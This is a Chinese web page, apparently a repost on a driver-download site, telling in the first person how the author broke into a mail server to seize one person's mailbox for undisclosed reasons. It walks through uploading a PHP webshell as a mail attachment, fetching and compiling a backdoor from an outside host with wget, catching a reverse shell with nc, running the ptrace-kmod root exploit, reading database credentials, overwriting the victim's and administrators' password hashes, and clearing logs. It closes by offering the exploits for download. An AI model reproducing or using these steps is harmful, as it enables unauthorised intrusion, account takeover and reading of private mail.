驱动管家:安全、高效、精准的专业驱动下载站!

如何得到mall信箱密码?linux 8.0主机系统入侵测试

2018-03-12 09:43:51责编:llp   来源:驱动管家     人气:

自从我承担起一个项目的负责人后,原本没有规律的生活现在更变的没有头绪了........时间的因素决定了自己无法去做一些想做的事情。但是有些时候又不得不去做一些不想做的事情。。。。。。

得到一个MAIL信箱地址,我想拿到这个信箱的密码。至于什么原因促使我必须要拿到此信箱的密码我在这里就保密。。。。。

如何得到mall信箱密码?linux 8.0主机系统入侵测试

要得到一个信箱的密码?暴力破解?枚举探测?NO!

一听暴力、枚举,我心都麻。。。。我害怕暴力、更害怕枚举:)

首先打开此信箱的登陆地址 http://mail.xxx.com.cn

简单了看了一下也没发现什么漏洞,在打开其主页http://www.xxx.com.cn

看看全都是一些HTML页面,连ASP都没有,心想这下不好办了,ASP代码漏洞,数据库插入漏洞统统派不上用场,好不容易有个论坛栏目还是空地,估计还没开。按惯例吧,看看是什么系统,心想应该是LINUX的吧,一般像邮局这些单位都比较喜欢用这类系统

ping www.xxx.com.cn

Pinging www.xxx.com.cn [61.xxx.xxx.xxx] with 32 bytes of data:

Reply from 61.xxx.xxx.xxx: bytes=32 time

501 Method

Not Implemented

Method Not Implemented



 to /index.html not supported.

Invalid method in request 



Apache/1.3.12 Server at www.xxx.com.cn Port 80

Connection to host lost.

看到了我想了解到的信息 Apache/1.3.12 ,WEB是用APACHE架设的,从PING值以及80返回的信息来看,判断对方的主机应该是linux系统。(此以上判断方法只是做为常用的判断手法,但不包含所有的服务器都可以用此方法判断出正确的xx作系统,有些管理员没事干的时候可以改改PING值,改改WEB返回的版本信息,那么你得到的将会是一个错误的信息了)

从WEB的整个站点来看没有什么可利用的东西,只开了80、25、110端口,没开远程TELNET管理,说不定还有_blank">防火墙。估计远程溢出等等程序都没有利用的余地了。没办法只好在回到mail.xxx.com.cn上看看,看着信箱登陆页面发呆着。。。。输入信箱用户名xxx密码:假密码(如果这时候要是碰巧输入的密码是对的那会如何?)

希望可以返回一些有用的错误信息,可见也很小气,只返回了,密码或者用户名错误,什么都没了。。。无语。。。。。。

眼睛一亮,上面这么大的图片写着免费注册,为什么不注册一个进去看看呢?正高兴的去点,怎么也点不开,还以为鼠标坏了呢。原来管理员把注册的连接地址去掉了,不允许注册。这是过分。。。

打开此页面仔细查看原代码,希望可以找到我需要的信息:(

用户名:

口 令:

 忘记密码-->

IP安全

-->

看到了mail/login.php、getpw.html与cert/index.html

第一个是验证登陆页面login.php,请求后没找到可利用漏洞,getpw.htm?难道是找回密码的页面?可惜请求此页面提示找不到该页,我想是管理员删除了吧。在接着请求cert/index.html 老天!真好,竟然是注册新用户的页面。(PS:我在想为何管理员删除了getpwd.htm为何留下了这个申请页面?难道是为了方便自己开新用户?那他用ADMIN帐号直接开用户不是更好?不解中。。。)

填好相关信息我注册了一个帐号为 test密码为test,登陆进去了高兴。。。。。。别人是不是在想就注册一个普通的信箱用户也高兴。。。。。:(

我的思路是上传一个webshell上去,然后就好办了。但是怎么上传上去呢,这个是个问题。注意有了,看到他是支持PHP的,那么APACHE的目录应该是不支持ASP的,找了个PHP的WEBSHELL。接着,邮件,发给谁?当然是发给自己了 上传wehbshell.php然后OK点发送,就自己给自己发了一封信,附件里载着我的希望。。。webshell.php,现在的思路是如何知道webshell.php的真实访问地址,凭着入侵积累的经验,不停止的对附件构造伪造的请求,终于返回了我需要的错误信息,判断一下便的到了真实的地址为

http://mail.xxx.com.cn/file/webshell.php

好了,得到一个SHELL了

uname 得到确实是linux的系统

ls -l

看一下文件

现在只是一个WEBSHELL环境,xx作起来及不舒服,还是先得到一个CMD下的SHELL好,找出一个LINUX的反向连接程序,这样用NC将会得到一个本地SHELL,那么LINUX来说本地溢出提升到ROOT权限不是更容易了。开始。。。

wget http://xxx.com/bd.c -O /tmp/door.c

把db.c传到TMP下改名为 door.c

注:只有对TMP目录里才有写的权限

gcc -o /tmp/door /tmp/door.c

把door.c编译

接着在PHP的SHELL里在输入

/tmp/door 211.xx.xxxx.xxx

要反弹连接到的机器IP(211.xxx.xxx.xxx为我的机器IP)

然后我在本机上开

nc -l -vv -p 4000

接着一会便出现了反弹成功的信息

uid 看了一下

接着提升权限到root

wget http://xxxx.xxx.xxxx/ptrace-kmod.c

下载到机器上

gcc -o ptrace-kmod ptrace-kmod.c

编译ptrace-kmod.c

运行ptrace-kmod

溢出成功,拿到了ROOT权限

ls -l

看到确定WEBMAIL的目录位置

然后进入到WEBMAIL的目录里ls -l

看到config.php文件

接着cat config.php

得到MYSQL的用户名为:root 密码为xxx

MAIL的数据库为webmail

好了,本地进行登陆MYSQL

mysql -u root -p

输入密码后进入了mysql

查看我需要的信箱用户xxx

select * from webmail where pw_name=’xxx’;

返回

----------------------------------------------------------------

pw_name pw_domain pw_passwd pw_uid pw_gid pw_gecos pw_dir

pw_shell

xxx mail.xxx.com.cn ftczP2YoArY7o 0 0 xxx /home/vp

opmail/domains/mail.xxx.com.cn/D/xxx 10485760

-------------------------------------------------------------------

看到了,我要的用户xxx的密码是 ftczP2YoArY7o,很明显是加密过的,既然加密过的,我就改他密码,然后进他的邮箱

select * from webmail where pw_name=’test’;

看我自己刚才注册的用户名信息

----------------------------------------------------------------

pw_name pw_domain pw_passwd pw_uid pw_gid pw_gecos pw_dir

pw_shell

test mail.xxx.com.cn ft6GFs8hTv26 0 0 test /home/vp

opmail/domains/mail.xxx.com.cn/D/xxx 10485760

-------------------------------------------------------------------

好了,看到我注册的test密码是ft6GFs8hTv26

update webmail;

update webmail set pw_passwd=’ft6GFs8hTv26 ’ where pw_name=’xxx’;

把用户名为xxx的密码改为test

顺便我也改了他的ADMIN和WEBMASTER的进去看一下,得到他的MAIL真的是没有管理员,难怪管理员没把那个申请的页面删除,还真是为了给自己用起来方便,呵呵。看完我所需要的信息后,在把他们的密码恢复。然后清除了日志,OK,此次入侵测试成功完成

对方的主机系统为linux 8.0的

上面用到的溢出代码,我都放在下再站的LINUX/exploits目录里,有需要的朋友可以自己去下。

  • 存在于ask文件的phpcms2008注射漏洞代码是什么?

    存在于ask文件的phpcms2008注射漏洞代码是什么?

    中秋节到了,这里我送上phpcms2008的一枚注射漏洞!!希望各位朋友多多支持本站啊~~漏洞存在于ask search php文件,以下是漏洞代码:if($keywords){$where = " AND title LIKE & 39;%$keywords%& 39; ";}$i

    详情2018-02-16 15:34:17责编:llp   来源:驱动管家     
  • 面向目标ip发起ddos攻击的木马工具

    面向目标ip发起ddos攻击的木马工具

    DDoS攻击通过大量合法的请求占用大量网络资源,以达到瘫痪网络的目的,词文章主要是针对那些对一种被大量肉鸡使用,面向目标IP发起DDoS攻击的木马工具。本篇文章是对一种被大量肉鸡使用,面向目标IP发起DDoS攻击

    详情2018-01-04 11:13:04责编:llp   来源:驱动管家     
  • Metasploit有哪些渗透命令?这些渗透命令的作用

    Metasploit有哪些渗透命令?这些渗透命令的作用

    这篇文章主要介绍了Metasploit的一些常用渗透命令,需要检测网站安全的朋友可以收藏下show exploits列出metasploit框架中的所有渗透攻击模块。show payloads列出metasploit框架中的所有攻击载荷。show auxilia

    详情2018-03-11 11:23:49责编:llp   来源:驱动管家     
  • 短信验证码真的安全吗?短信验证码诈骗威胁着我们

    短信验证码真的安全吗?短信验证码诈骗威胁着我们

    现在想换个手机越来越麻烦,很多APP要重新下,手机里保存的宝贝也要转移,有时候这些事情甚至让我放弃了换个更好的手机的想发,更不用说换手机号了。各种网站、邮箱、账号的绑定要重新解绑,各种银行要跑去柜台重

    详情2018-01-18 11:25:43责编:llp   来源:驱动管家     
  • 网络安全密钥 怎么获取密钥生成算法?

    网络安全密钥 怎么获取密钥生成算法?

    从拷贝保护产品中剥取(ripping)算法通常是创建密钥生成程序的一种简单而行之有效的方法。其思路非常简单:定位受保护程序内计算合法序列号的函数(可能不止一个函数),并将它(们)移植到你密钥生成程序中。这

    详情2018-01-13 17:21:44责编:llp   来源:驱动管家     
  • iis6存在漏洞?iis6漏洞会导致信息泄露

    iis6存在漏洞?iis6漏洞会导致信息泄露

    近日,安全专家对使用微软Internet信息服务IIS 6的管理员发出警告,声称Web服务器很容易受到攻击并暴露出密码保护的文件和文件夹。据悉,基于WebDAV协议的部分进程命令中存在这种漏洞。通过给Web地址添加一些Uni

    详情2018-01-19 15:10:26责编:llp   来源:驱动管家     
  • 解决sql注入攻击问题的方法 如何保护隐蔽域信息?

    解决sql注入攻击问题的方法 如何保护隐蔽域信息?

    SQL注入攻击的危害性很大。在讲解其防止办法之前,数据库管理员有必要先了解一下其攻击的原理。这有利于管理员采取有针对性的防治措施。解决方案:过滤URL中的一些特殊字符,动态SQL语句使用PrepareStatement 注

    详情2018-03-05 16:51:28责编:llp   来源:驱动管家     
  • 3g上网卡哪个好?3g上网卡怎么用?

    3g上网卡哪个好?3g上网卡怎么用?

    最近一段时间内,3G已经开始大规模的试商用了,不过许多用户拿到的并不是3G手机,而是3G上网终端。相对于使用手机3G上网而言,用笔记本电脑配合3G上网卡上网,速度上会更快一些,就以我目前所拿到的华为3G上网卡

    详情2018-01-18 19:33:45责编:llp   来源:驱动管家     
  • 手机程序加密 如何配置邮件pops加密?

    手机程序加密 如何配置邮件pops加密?

    电子邮件又称电子信箱、电子邮政,它是—种用电子手段提供信息交换的通信方式,是Internet应用最广的服务,通过网络的电子邮件系统,用户可以用非常低廉的价格(不管发送到哪里,都只需负担电话费和网费即可),以

    详情2018-01-29 08:58:08责编:llp   来源:驱动管家     
  • order by的参数注入技巧 limit的参数注入技巧

    order by的参数注入技巧 limit的参数注入技巧

    一、order by 的参数注入技巧:两种方法,思路都一样。example “select username,password from uc_members order by” $_GET[& 39;oderby& 39;]a 常见的利用方法:1 [SQL] select username,password

    详情2018-03-08 17:48:23责编:llp   来源:驱动管家